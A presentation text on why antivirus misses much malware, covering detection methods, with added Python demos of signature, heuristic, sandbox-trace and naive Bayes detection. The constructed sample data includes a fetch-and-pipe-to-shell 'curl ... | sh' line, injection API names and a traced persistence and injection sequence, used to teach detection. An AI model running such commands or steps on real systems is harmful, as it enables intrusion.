1 Beyond Anti-Virus, by Dan Keller
1987, Fred Cohen, computer scientist: “there is no algorithm that can perfectly detect all possible computer viruses”

2 What is Anti-Virus (AV) Software?
Anti-virus software is used to prevent, detect, and remove malicious software. Some examples of malicious software detected by modern AV:
- BHOs (Browser Helper Objects)
- Browser hijackers
- Ransomware
- Keyloggers
- Backdoors
- Rootkits
- Trojan horses
- Worms
- Adware
- Spyware

3 Statistics
AV-TEST, The Independent IT-Security Institute, unique malware samples in its database:
- 1994: 28,613
- 1999: 98,428
- 2005: 333,425
- 2007: 5,490,960 new unique malware samples in that year alone!
- 2015: approx. 144,000,000 new malware variants

4 Lastline Labs Study (May ’13 to May ’14)
Hundreds of thousands of malware samples vs. 47 AV vendors. Results:
- Day 0: only 51% of AV scanners detected new malware samples
- 2 weeks: detection rates bumped up to 61%
- 1 year: 10% of AV scanners still did not detect some malware
- The 1% of malware least likely to be detected went undetected by the majority of AV scanners for months, and in some cases was never detected
___________________________________________________________
**It's estimated that AV only catches around 45% of cyber attacks (Symantec VP Brian Dye). He said antivirus “is dead” (May 2014).

5 Now that you’re depressed…where do we go from here?
Anti-virus methods of detection:
- Signature-based detection: when identifying viruses and other malware, the antivirus engine compares the contents of a file (its hash, or byte patterns within it) to its database of known malware signatures. Any change to the file, even a single byte in a hashed region, produces a new signature.
- Heuristic-based detection: generally used together with signature-based detection. It detects malware based on characteristics typically found in known malware code (suspicious API names, packed or encrypted sections, and so on) rather than on an exact match.
- Behavioural-based detection: instead of characteristics hard-coded in the malware itself, it is based on the behavioural fingerprint of the malware at run time. This technique can only detect malware after it has started performing its malicious actions.
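The following is an added example, not code from the presentation or from any AV product. It shows the first two methods side by side on constructed byte strings (not real malware): a hash signature, a byte-pattern signature, and a heuristic score built from entropy and suspicious strings. The signature names, the threshold of 3 and the 7.0-bit entropy cut-off are assumptions chosen for the demonstration, and the three malicious variants illustrate why day-0 detection is poor: one changed byte defeats the hash, a re-ordered pattern defeats the byte signature, and only the heuristic still fires.

```python
import hashlib
import math

# Constructed sample "files" (not real malware). All assumptions of this example.
BENIGN = b"MZ\x90\x00" + b"hello world, this is a boring utility\n" * 4
MALICIOUS = (b"MZ\x90\x00" + b"CreateRemoteThread\x00VirtualAllocEx\x00"
             + b"powershell -enc \x00" + bytes(range(256)) * 2)
# One trailing byte changed: the full-file hash no longer matches.
VARIANT = MALICIOUS[:-1] + b"\x01"
# Same strings, but the two API names are no longer adjacent, so the
# byte-pattern signature no longer matches either.
REPACKED = (b"MZ\x90\x00" + b"CreateRemoteThread\x00" + b"padding"
            + b"VirtualAllocEx\x00" + b"powershell -enc \x00" + bytes(range(256)) * 2)

# Toy signature database (assumed format, not any vendor's).
HASH_SIGS = {hashlib.sha256(MALICIOUS).hexdigest(): "Trojan.Sample"}
PATTERN_SIGS = {b"CreateRemoteThread\x00VirtualAllocEx": "Inject.Generic"}

# Strings a heuristic engine might weight; assumed list.
SUSPICIOUS_STRINGS = (b"powershell -enc", b"VirtualAllocEx", b"CreateRemoteThread")


def signature_scan(data: bytes):
    """Exact-match detection: full-file hash first, then byte patterns."""
    digest = hashlib.sha256(data).hexdigest()
    if digest in HASH_SIGS:
        return HASH_SIGS[digest]
    for pattern, name in PATTERN_SIGS.items():
        if pattern in data:
            return name
    return None


def entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte; packed/encrypted payloads approach 8."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def heuristic_score(data: bytes) -> int:
    """Additive score over characteristics typical of malware, not exact matches."""
    score = 0
    if entropy(data) > 7.0:      # looks packed or encrypted
        score += 2
    for s in SUSPICIOUS_STRINGS:
        if s in data:
            score += 1
    return score


def classify(data: bytes, threshold: int = 3):
    """Signature hit wins; otherwise fall back to the heuristic score."""
    sig = signature_scan(data)
    if sig:
        return ("signature", sig)
    score = heuristic_score(data)
    if score >= threshold:
        return ("heuristic", f"score={score}")
    return ("clean", None)


if __name__ == "__main__":
    for name, blob in [("benign", BENIGN), ("malicious", MALICIOUS),
                       ("variant", VARIANT), ("repacked", REPACKED)]:
        print(f"{name:10s} entropy={entropy(blob):.2f} -> {classify(blob)}")
```

The trade-off the slide hints at is visible here: the heuristic catches the repacked sample that both signatures miss, but the same rule (high entropy plus a few API names) would also flag many legitimately packed or obfuscated installers, which is where the false positives of slide 9 come from.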

6 …Cont’d
- Sandbox detection: a behavioural-based technique that, instead of fingerprinting behaviour on the real host at run time, executes the program in a virtual environment and logs the actions it performs (files written, registry keys set, network connections, process injection). Depending on the actions logged, the antivirus engine decides whether the program is malicious; if not, the program is executed in the real environment. This technique has proven very effective, but because it is resource-heavy and slow it is rarely used in end-user antivirus solutions. It also shares the limitation of all behavioural detection: a sample that recognises the sandbox and simply sleeps produces no actions to judge.
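An added example of the decision step that follows sandbox execution; it is not code from the presentation or from any sandbox product. The trace format (a timestamp, a pid, an action and key=value arguments), the three traced processes and the scoring rules are all constructed for this illustration. The point it adds to the slide is the last process: it fingerprints the hardware and then sleeps for ten minutes, so the sandbox sees no malicious actions and the only honest verdict is "inconclusive", not "benign".

```python
import re
from collections import defaultdict

# Constructed sandbox trace; not the output of any real product.
TRACE = r"""
0.001 pid=1204 CreateProcess image=C:\Users\u\Downloads\invoice.exe
0.010 pid=1204 RegSetValue key=HKCU\Software\Microsoft\Windows\CurrentVersion\Run value=upd
0.012 pid=1204 WriteFile path=C:\Users\u\AppData\Roaming\upd.exe
0.200 pid=1204 NetConnect dst=203.0.113.7:443
0.250 pid=1204 OpenProcess target=explorer.exe access=PROCESS_VM_WRITE
0.251 pid=1204 WriteProcessMemory target=explorer.exe
0.252 pid=1204 CreateRemoteThread target=explorer.exe
0.002 pid=3311 CreateProcess image=C:\Program Files\Notepad\notepad.exe
0.500 pid=3311 WriteFile path=C:\Users\u\Documents\notes.txt
0.600 pid=3311 NetConnect dst=updates.example.com:443
0.003 pid=4420 CreateProcess image=C:\Users\u\Downloads\setup.exe
0.004 pid=4420 QueryRegistry key=HKLM\HARDWARE\DESCRIPTION\System\SystemBiosVersion
0.005 pid=4420 Sleep ms=600000
"""

LINE_RE = re.compile(r"^(?P<ts>[\d.]+) pid=(?P<pid>\d+) (?P<action>\w+)(?P<rest>.*)$")
# Values may contain spaces (e.g. "Program Files"), so stop only before the next key=.
KV_RE = re.compile(r"(\w+)=(.*?)(?= \w+=|$)")

PERSISTENCE_KEYS = (r"\CurrentVersion\Run", r"\Start Menu\Programs\Startup")
INJECTION_CHAIN = ("OpenProcess", "WriteProcessMemory", "CreateRemoteThread")
RAW_IP_RE = re.compile(r"^\d{1,3}(\.\d{1,3}){3}:\d+$")
LONG_SLEEP_MS = 300_000   # assumed evasion threshold (5 minutes)


def parse(trace: str):
    """Group parsed events by pid, each as (ts, action, args)."""
    per_pid = defaultdict(list)
    for line in trace.strip().splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = dict(KV_RE.findall(m.group("rest").strip()))
        per_pid[int(m.group("pid"))].append((float(m.group("ts")), m.group("action"), args))
    return {pid: sorted(evts) for pid, evts in per_pid.items()}


def is_subsequence(chain, seq):
    it = iter(seq)
    return all(step in it for step in chain)


def score_process(events):
    """Weighted rules over logged actions; weights are assumptions."""
    score, reasons = 0, []
    by_target = defaultdict(list)
    for _, action, args in events:
        if action == "RegSetValue" and any(k in args.get("key", "") for k in PERSISTENCE_KEYS):
            score += 2; reasons.append("registry run-key persistence")
        if action == "WriteFile" and PERSISTENCE_KEYS[1] in args.get("path", ""):
            score += 2; reasons.append("startup-folder persistence")
        if action == "NetConnect" and RAW_IP_RE.match(args.get("dst", "")):
            score += 1; reasons.append("connection to raw IP")
        if action == "QueryRegistry" and "SystemBiosVersion" in args.get("key", ""):
            reasons.append("VM/hardware fingerprinting")
        if action in INJECTION_CHAIN:
            by_target[args.get("target")].append(action)
    for target, seq in by_target.items():
        if is_subsequence(INJECTION_CHAIN, seq):   # order matters
            score += 3; reasons.append(f"code injection into {target}")
    return score, reasons


def verdict(events, threshold: int = 4):
    score, reasons = score_process(events)
    if score >= threshold:
        return "malicious", score, reasons
    # Nothing malicious observed: distinguish "did nothing" from "waited us out".
    for _, action, args in events:
        if action == "Sleep" and int(args.get("ms", "0")) >= LONG_SLEEP_MS:
            return "inconclusive", score, reasons + ["long sleep, possible sandbox evasion"]
    return "benign", score, reasons


def analyze(trace: str):
    return {pid: verdict(evts) for pid, evts in parse(trace).items()}


if __name__ == "__main__":
    for pid, (v, score, reasons) in analyze(TRACE).items():
        print(pid, v, score, reasons)
```

Two design choices matter in practice: the injection rule requires the three calls in order against the same target, because OpenProcess alone is normal for many tools, and a long sleep after hardware fingerprinting is reported separately from "benign" so that the sample can be rerun with a longer timeout or with the sleep patched out.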

7 …Cont’d
- Data mining techniques: the latest approach applied to malware detection. Data mining and machine learning algorithms are used to classify a file as either malicious or benign, given a series of features extracted from the file itself (for example header fields, entropy, imported API names or embedded strings), with the classifier trained on labelled samples.
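An added example of the feature-extraction-plus-classifier approach, not code from the presentation or from any product. It extracts six boolean features from a file's bytes and trains a hand-written Bernoulli naive Bayes classifier (with Laplace smoothing) on a constructed, labelled training set of six byte strings, then scores two unseen samples. The feature list, the training data and the labels are all assumptions made for the illustration; a real deployment would use thousands of samples and far richer features.

```python
import math

FEATURES = ("high_entropy", "has_pe_header", "has_powershell",
            "has_url", "has_inject_api", "tiny")


def entropy(data: bytes) -> float:
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def extract(data: bytes) -> dict:
    """Static features taken from the file content only (assumed feature set)."""
    low = data.lower()
    return {
        "high_entropy": entropy(data) > 7.0,
        "has_pe_header": data[:2] == b"MZ",
        "has_powershell": b"powershell" in low,
        "has_url": b"http://" in low or b"https://" in low,
        "has_inject_api": b"virtualallocex" in low or b"createremotethread" in low,
        "tiny": len(data) < 64,
    }


# Constructed training set: (bytes, label). Not real malware.
UNIFORM = bytes((i * 37) % 256 for i in range(1024))       # every byte value 4 times
TRAIN = [
    (b"MZ" + bytes(range(256)) * 2 + b"powershell -enc ", "malicious"),
    (b"MZ" + UNIFORM + b"VirtualAllocEx http://203.0.113.9/p ", "malicious"),
    (b"#!/bin/sh\ncurl http://198.51.100.2/x | sh\n", "malicious"),
    (b"MZ" + b"This program cannot be run in DOS mode.\r\n" * 10, "benign"),
    (b"<!doctype html><html><a href=https://example.org>home</a></html>" * 5, "benign"),
    (b"#!/bin/sh\necho hello\n", "benign"),
]


class BernoulliNB:
    """Naive Bayes over boolean features with additive (Laplace) smoothing."""

    def __init__(self, alpha: float = 1.0):
        self.alpha = alpha
        self.prior = {}
        self.cond = {}      # cond[label][feature] = P(feature present | label)

    def fit(self, samples):
        labels = [label for _, label in samples]
        for label in set(labels):
            rows = [extract(data) for data, l in samples if l == label]
            self.prior[label] = len(rows) / len(samples)
            self.cond[label] = {
                f: (sum(r[f] for r in rows) + self.alpha) / (len(rows) + 2 * self.alpha)
                for f in FEATURES
            }
        return self

    def predict_proba(self, data: bytes) -> dict:
        x = extract(data)
        logp = {}
        for label in self.prior:
            lp = math.log(self.prior[label])
            for f in FEATURES:
                p = self.cond[label][f]
                lp += math.log(p if x[f] else 1.0 - p)
            logp[label] = lp
        m = max(logp.values())                      # log-sum-exp normalisation
        z = sum(math.exp(v - m) for v in logp.values())
        return {label: math.exp(v - m) / z for label, v in logp.items()}


def train_model() -> BernoulliNB:
    return BernoulliNB().fit(TRAIN)


# Unseen samples, also constructed.
UNSEEN_MALICIOUS = b"MZ" + UNIFORM + b"CreateRemoteThread"
UNSEEN_BENIGN = b"Dear customer, your invoice is attached. Regards, accounts team.\n" * 3

if __name__ == "__main__":
    model = train_model()
    for name, blob in [("unseen malicious", UNSEEN_MALICIOUS), ("unseen benign", UNSEEN_BENIGN)]:
        print(name, extract(blob), model.predict_proba(blob))
```

Because every feature here is static, the classifier inherits the weakness of the heuristics it generalises: an attacker who packs the payload differently or pads it with benign-looking text moves the features, and a model trained on last year's samples drifts, which is why such models are retrained continuously and combined with the behavioural methods above.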

8 Other approaches
- Unified Threat Management: firewalls, gateway AV, content filtering, load balancing and data leak prevention all rolled up into one system
- Push your info to the cloud and let them deal with it
- Go back to paper
- Go off grid and live in the mountains

9 Drawbacks
- Lots of false positives, creating ‘the boy who cried wolf’; false positives can also end up deleting or quarantining existing files that are clean
- Some more advanced systems (sandboxing) can slow down performance
- Tough to get out of contracts with existing vendors

10 Conclusion
Anti-virus is not dead. It's just a baseline on which we build. Anti-virus software is now being bundled with other security software to form a more comprehensive system, and monitoring is increasingly outsourced to other companies that watch your systems in real time.

